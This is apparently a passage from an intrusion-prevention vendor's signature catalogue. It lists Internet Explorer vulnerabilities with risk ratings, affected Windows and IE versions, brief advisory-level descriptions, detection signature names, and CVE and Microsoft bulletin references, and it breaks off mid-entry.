Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4088

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-603-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows XP SP2; Windows Vista; Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2003; Windows 2008; Windows 2008 R2; Windows 2012; Windows 2012 R2

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4088

References:

CVE-2014-4088
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4088

MS14-052
http://technet.microsoft.com/security/bulletin/MS14-052

Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4089

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-603-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 2003; Windows XP; Windows XP SP2; Windows 7; Windows 8; Windows 2008; Windows 2012

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4089

References:

CVE-2014-4089
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4089

MS14-052
http://technet.microsoft.com/security/bulletin/MS14-052

Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4092

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-603-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 2003; Windows XP; Windows XP SP2; Windows 7; Windows 8; Windows 2008; Windows 2012

Software:

Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4092-2
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4092-1

References:

CVE-2014-4092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4092

MS14-052
http://technet.microsoft.com/security/bulletin/MS14-052

Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4094

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-603-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 2003; Windows XP; Windows XP SP2; Windows 7; Windows 8; Windows 2008; Windows 2012

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4094

References:

CVE-2014-4094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4094

MS14-052
http://technet.microsoft.com/security/bulletin/MS14-052

Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4095

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-603-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 8; Windows 2008; Windows 2012

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-Vulnerability-CVE-2014-4095

References:

CVE-2014-4095
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4095

MS14-052
http://technet.microsoft.com/security/bulletin/MS14-052

Microsoft-Internet-Explorer-Mismatched-DOM-Objects-Memory-Corruption

About this vulnerability:

Memory corruption vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-111-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer. The memory corruption happens when an improperly initialized function is called via the onLoad handler, leading to a condition that may allow code execution in the context of the current user.

Situation:

HTTP_Microsoft-Internet-Explorer-Mismatched-DOM-Objects-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Mismatched-DOM-Objects-Memory-Corruption

References:

CVE-2005-1590
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1590

BID-13799
http://www.securityfocus.com/bid/13799

OSVDB-15897
http://www.osvdb.org/15897

MS05-054
http://technet.microsoft.com/security/bulletin/MS05-054

Microsoft-Internet-Explorer-Mouse-Movement-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-538-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Malfunction

Description:

Microsoft Internet Explorer is vulnerable to an information disclosure vulnerability. The vulnerability allows a web page to track mouse movements using script code, even if the page is not active or in focus. This can also track the state of Ctrl, Shift and Alt keys. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web page. Successful exploitation would result in the disclosure of mouse movements. This may have particular consequences when using virtual keyboards or graphical authentication methods.

Situation:

File-Text_Microsoft-Internet-Explorer-Mouse-Movement-Information-Disclosure

References:

BID-56921
http://www.securityfocus.com/bid/56921

OSVDB-88357
http://www.osvdb.org/88357

Microsoft-Internet-Explorer-msxml3-Concurrency-Vulnerability

About this vulnerability:

There is a memory corruption vulnerability in Microsoft Internet Explorer

Risk:

Low

First detected in:

sgpkg-ips-97-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a remote memory corruption vulnerability in Microsoft Internet Explorer. With a crafted XML page, it is possible to cause a memory corruption in the context of the browser. This leads to abnormal browser termination.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-msxml3-Concurrency-Vulnerability
File-Text_Microsoft-Internet-Explorer-msxml3-Concurrency-Vulnerability

References:

CVE-2007-0099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0099

BID-21872
http://www.securityfocus.com/bid/21872

OSVDB-32627
http://www.osvdb.org/32627

MS08-069
http://technet.microsoft.com/security/bulletin/MS08-069

Microsoft-Internet-Explorer-Multiple-Event-Handler-Memory-Corruption

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-586-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0

Type:

Input Validation

Description:

There is a buffer overflow vulnerability in Microsoft Internet Explorer related to rendering an HTML element with many event handlers.

Situation:

File-Text_Microsoft-Internet-Explorer-Multiple-Event-Handler-Memory-Corruption

References:

CVE-2006-1245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1245

BID-17131
http://www.securityfocus.com/bid/17131

OSVDB-23964
http://www.osvdb.org/23964

MS06-013
http://technet.microsoft.com/security/bulletin/MS06-013

Microsoft-Internet-Explorer-Multiple-Events-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-681-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows Vista; Windows 7; Windows 2003; Windows 2008

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0

Type:

Malfunction

Description:

A remote code execution vulnerability exists in Internet Explorer. The vulnerability is due to the use of an object after it has been deleted (use-after-free). A remote, unauthenticated attacker can exploit this vulnerability by enticing a target user to open either an HTML document with Internet Explorer, or a Microsoft Office document with an embedded "safe for initialization" ActiveX component that hosts the IE rendering engine. A successful exploitation attempt could result in the execution of arbitrary code in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Multiple-Events-Use-After-Free

References:

CVE-2012-1878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1878

BID-53867
http://www.securityfocus.com/bid/53867

OSVDB-82868
http://www.osvdb.org/82868

MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037

Microsoft-Internet-Explorer-Null-Byte-CVE-2012-0012

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-440-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Null-Byte-CVE-2012-0012
File-Text_Microsoft-Internet-Explorer-HTML-Layout-CVE-2012-0011

References:

CVE-2012-0012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0012

MS12-010
http://technet.microsoft.com/security/bulletin/MS12-010

Microsoft-Internet-Explorer-Null-Byte-CVE-2012-1873

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-457-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 8.0; Internet Explorer 7.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Null-Byte-CVE-2012-1873

References:

CVE-2012-1873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1873

MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037

Microsoft-Internet-Explorer-Null-Byte-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-826-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Null-Byte-Information-Disclosure

References:

CVE-2012-0012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0012

BID-51932
http://www.securityfocus.com/bid/51932

OSVDB-79267
http://www.osvdb.org/79267

MS12-010
http://technet.microsoft.com/security/bulletin/MS12-010

Microsoft-Internet-Explorer-Object-Management-CVE-2011-1345

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-386-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows XP; Windows 2003; Windows 2008; Windows 7; Windows 2008 R2

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Object-Management-CVE-2011-1345
File-Text_Microsoft-Internet-Explorer-Object-Management-CVE-2011-1345

References:

CVE-2011-1345
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1345

BID-46821
http://www.securityfocus.com/bid/46821

MS11-018
http://technet.microsoft.com/security/bulletin/MS11-018

Microsoft-Internet-Explorer-Object-Reference-Counting-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-134-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability Microsoft Internet Explorer. Internet Explorer incorrectly handles initialized or removed objects, causing memory corruption. Remote attackers can exploit this vulnerability by persuading target users to visit a specially crafted web page. Successful exploitation may allow the attacker to execute arbitrary code on the vulnerable client system, in the context of the logged in user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Object-Reference-Counting-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Object-Reference-Count-Memory-Corruption

References:

CVE-2007-3902
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3902

BID-26506
http://www.securityfocus.com/bid/26506

MS07-069
http://technet.microsoft.com/security/bulletin/MS07-069

Microsoft-Internet-Explorer-Object-Tag-Popup

About this vulnerability:

A object type validation error in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-267-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer

Type:

Input Validation

Description:

An object type validation error exists in Internet Explorer. While assuming that the popup content is either html or javascript it is still executed even when its not. This may lead to a system compromise.

Situation:

HTTP_SS-Internet-Explorer-Object-Tag-Popup
HTTP_SS-Internet-Explorer-Object-Type-Open-Window
File-Text_Internet-Explorer-Object-Tag-Popup
File-Text_Internet-Explorer-Object-Type-Open-Window

References:

CVE-2003-0838
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0838

BID-8556
http://www.securityfocus.com/bid/8556

OSVDB-7872
http://www.osvdb.org/7872

MS03-040
http://technet.microsoft.com/security/bulletin/MS03-040

Microsoft-Internet-Explorer-Objects-Handling-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-586-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows Vista; Windows 2003; Windows 2008

Software:

Internet Explorer 6.0; Internet Explorer 7.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer. A crafted webpage can cause Internet Explorer to access uninitialized memory leading to a crash or execution of arbitrary code within the context of the currently logged in user. An attack targeting this vulnerability can result in the injection and execution of arbitrary code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any injected code will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, Internet Explorer may terminate abnormally.

Situation:

File-Text_Microsoft-Internet-Explorer-Objects-Handling-Memory-Corruption

References:

CVE-2008-2254
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2254

BID-30614
http://www.securityfocus.com/bid/30614

MS08-045
http://technet.microsoft.com/security/bulletin/MS08-045

Microsoft-Internet-Explorer-OnMove-Use-After-Free-CVE-2012-1529

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-480-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-OnMove-Use-After-Free-CVE-2012-1529

References:

CVE-2012-1529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1529

BID-55641
http://www.securityfocus.com/bid/55641

OSVDB-85571
http://www.osvdb.org/85571

MS12-063
http://technet.microsoft.com/security/bulletin/MS12-063

Microsoft-Internet-Explorer-Onpropertychange-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-547-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A use-after-free vulnerability exists in Internet Explorer. The vulnerability is due to an error in the way onpropertychange events are handled. A remote attacker could exploit these vulnerabilities by enticing the target user to open a malicious web page. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Onpropertychange-Use-After-Free

References:

CVE-2013-3897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3897

OSVDB-98207
http://www.osvdb.org/98207

MS13-080
http://technet.microsoft.com/security/bulletin/MS13-080

Microsoft-Internet-Explorer-onreadystatechange-CVE-2012-0170

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-446-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 7.0; Internet Explorer 6.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-onreadystatechange-CVE-2012-0170

References:

CVE-2012-0170
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0170

BID-52904
http://www.securityfocus.com/bid/52904

OSVDB-81128
http://www.osvdb.org/81128

MS12-023
http://technet.microsoft.com/security/bulletin/MS12-023

Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free

About this vulnerability:	A vulnerability in Microsoft Internet Explorer
Risk:	High
First detected in:	sgpkg-ips-604-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows Vista; Windows 7; Windows 2008; Windows 2008 R2
Software:	Internet Explorer 9.0
Type:	Malfunction
Description:	A use after free vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error while handling certain objects if the HTML markup is overwritten inside an onreadystatechange event handler. A remote unauthenticated attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation could lead to arbitrary code execution in the security context of the target user.
Situation:	File-Text_Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free

Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free-CVE-2010-0491

About this vulnerability:

A memory corruption vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-298-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document to execute non-privileged arbitrary code.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free
File-Text_Microsoft-Internet-Explorer-onreadystatechange-Use-After-Free-CVE-2010-0491

References:

CVE-2010-0491
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0491

BID-39027
http://www.securityfocus.com/bid/39027

OSVDB-63331
http://www.osvdb.org/63331

MS10-018
http://technet.microsoft.com/security/bulletin/MS10-018

Microsoft-Internet-Explorer-Option-Element-Use-After-Free

About this vulnerability:

Microsoft Internet Explorer Option Element Use After Free vulnerability.

Risk:

High

First detected in:

sgpkg-ips-687-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer, versions 6 through 8, which allows remote attackers to execute arbitrary code by dereferencing already freed memory. This is possible due to the Option cache not being properly updated, allowing other JavaScript methods to access a deleted Option element.

Situation:

Generic_SS-Microsoft-Ie-Body-Element-Use-After-Free
File-Text_Microsoft-Ie-Body-Element-Use-After-Free

References:

CVE-2011-1996
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1996

OSVDB-76208
http://www.osvdb.org/76208

MS11-081
http://technet.microsoft.com/security/bulletin/MS11-081

Microsoft-Internet-Explorer-Out-Of-Bounds-Vulnerability-CVE-2018-0996

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There has been reported an out-of-bounds vulnerability in Internet Explorer browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.

Situation:

File-Text_Microsoft-Internet-Explorer-Out-Of-Bounds-Vulnerability-CVE-2018-0996

References:

CVE-2018-0996
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0996

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Microsoft-Internet-Explorer-outerHTML-Information-Disclosure

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-586-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0

Type:

Input Validation

Description:

There is an information disclosure vulnerability in Microsoft Internet Explorer when processing javascript that references an object's outerHTML attribute.

Situation:

File-Text_Microsoft-Internet-Explorer-outerHTML-Information-Disclosure

References:

CVE-2006-3280
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3280

BID-18682
http://www.securityfocus.com/bid/18682

MS06-042
http://technet.microsoft.com/security/bulletin/MS06-042

Microsoft-Internet-Explorer-Plugin-Loading-Address-Bar-Spoofing

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is an address bar spoofing vulnerability in the Microsoft Internet Explorer. The vulnerability is specific to improperly handling resources that require a plugin to be processed. This flaw can be used to spoof the address bar of the browser to mislead a user as to the origin of a resource. Upon exploitation, the affected client browser will render a resource from a specific domain while the address bar of the browser will display a different domain, not reflecting the true origin of the resource. No other inconsistent behaviour will be observed after exploitation.

Situation:

File-Text_Microsoft-Internet-Explorer-Plugin-Loading-Address-Bar-Spoofing

References:

CVE-2006-1626
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1626

BID-17404
http://www.securityfocus.com/bid/17404

MS06-021
http://technet.microsoft.com/security/bulletin/MS06-021

Microsoft-Internet-Explorer-Popup-Title-Bar-Spoofing

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0

Type:

Malfunction

Description:

A vulnerability exists in the way Internet Explorer displays content in the title bar for script-initiated popup windows. With a DNS server that supports wild-card resolving, a trusted hostname can be displayed as the starting part of a malicious hostname in the popup window's title bar. This can be used to mislead a user into thinking that a trusted site is visited, while the page is loaded with attacker-supplied content. A second related vulnerability exists in the way Internet Explorer displays content in the title bar for script-initiated popup windows. When the content of a title tag in HTML contains scheme content (i.e., "http://"), the text is displayed in the title bar. This can be used to mislead a user into thinking that a trusted site is visited. When the target opens a malicious link from the attacker, the target system will pop up a window with new content. The malicious pop-up window does not have an address bar and therefore, only the content of the title bar reveals information about the source of the content. Using either the domain name or title tag vulnerabilities, a trusted URL may be spoofed in the title bar. The target user may be deceived into sending confidential information.

Situation:

File-Text_Microsoft-Internet-Explorer-Popup-Title-Bar-Spoofing

References:

CVE-2005-0500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0500

BID-12602
http://www.securityfocus.com/bid/12602

Microsoft-Internet-Explorer-Print-Preview-Handling-Command-Execution

About this vulnerability:

Command execution vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-191-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0

Type:

Script Injection

Description:

There is a command execution vulnerability in Microsoft Internet Explorer. The application has improper security enforcement in the implementation of Print Preview. Remote attackers can exploit this vulnerability by persuading target users to visit a specially-crafted web page. Successful exploitation may allow the attacker to execute arbitrary commands on the vulnerable client system in the context of the currently logged on user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Print-Preview-Handling-Command-Execution
File-Text_Microsoft-Internet-Explorer-Print-Preview-Handling-Command-Execution

References:

CVE-2008-2259
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2259

BID-30612
http://www.securityfocus.com/bid/30612

MS08-045
http://technet.microsoft.com/security/bulletin/MS08-045

Microsoft-Internet-Explorer-Propertydesc-Double-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-847-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer.

Situation:

File-TextId_Microsoft-Internet-Explorer-Propertydesc-Double-Free

References:

CVE-2016-0111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0111

MS16-023
http://technet.microsoft.com/security/bulletin/MS16-023

Microsoft-Internet-Explorer-Race-Condition-CVE-2011-1257

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-406-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A vulnerability in Microsoft Internet Explorer

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Race-Condition-CVE-2011-1257
File-Text_Microsoft-Internet-Explorer-Race-Condition-CVE-2011-1257

References:

CVE-2011-1257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1257

MS11-057
http://technet.microsoft.com/security/bulletin/MS11-057

Microsoft-Internet-Explorer-Redirect-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-400-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008

Software:

Internet Explorer 9.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an error handling HTTP 30x server redirect responses that contain the CDL protocol.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Redirect-Memory-Corruption
HTTP_SHS-Microsoft-Internet-Explorer-Redirect-Memory-Corruption

References:

CVE-2011-1262
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1262

OSVDB-72952
http://www.osvdb.org/72952

MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050

Microsoft-Internet-Explorer-Remote-Code-Execution-CVE-2009-3762

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-268-3038

Last changed:

sgpkg-ips-1734-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008

Software:

Internet Explorer 6.0; Internet Explorer 7.0

Type:

Input Validation

Description:

There is a remote code execution vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Remote-Code-Execution-CVE-2009-3762
File-Text_Microsoft-Internet-Explorer-Style-Object-Memory-Corruption

References:

CVE-2009-3762
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3762

Microsoft-Internet-Explorer-Runtimestyle-Handling-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 8; Windows 2008; Windows 2012

Software:

Internet Explorer 10.0

Type:

Malfunction

Description:

Situation:

File-Text_Microsoft-Internet-Explorer-Runtimestyle-Handling-Memory-Corruption

References:

CVE-2013-3882
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3882

OSVDB-98204
http://www.osvdb.org/98204

MS13-080
http://technet.microsoft.com/security/bulletin/MS13-080

Microsoft-Internet-Explorer-Same-Id-Property-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-687-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Internet Explorer. Exploitation of the vulnerability could lead to the execution of arbitrary code in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Same-Id-Property-Use-After-Free

References:

CVE-2012-1875
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1875

OSVDB-82865
http://www.osvdb.org/82865

MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037

Microsoft-Internet-Explorer-Same-Origin-Policy-Bypass

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-629-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

A same-origin policy bypass vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to error in updating origin data. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to open a web page. Successful exploitation can result in the disclosure of information about other web pages opened by the user or stored in the browser cache.

Situation:

File-Text_Microsoft-Internet-Explorer-Same-Origin-Policy-Bypass

References:

CVE-2015-0072
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0072

BID-72489
http://www.securityfocus.com/bid/72489

OSVDB-117876
http://www.osvdb.org/117876

MS15-018
http://technet.microsoft.com/security/bulletin/MS15-018

Microsoft-Internet-Explorer-Script-Engine-Stack-Exhaustion

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a stack exhaustion vulnerability in the Microsoft Internet Explorer Script Engine. The flaw is caused by certain types of recursive function calls in Javascript code. An attacker can exploit this vulnerability to cause a denial of service condition of the vulnerable application.

Situation:

File-Text_Microsoft-Internet-Explorer-Script-Engine-Stack-Exhaustion

References:

BID-16687
http://www.securityfocus.com/bid/16687

Microsoft-Internet-Explorer-Scripting-Engine-Vulnerability-CVE-2018-0866

About this vulnerability:

A vulnerability in Microsoft Internet Explorer 11

Risk:

High

First detected in:

sgpkg-ips-1043-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Input Validation

Description:

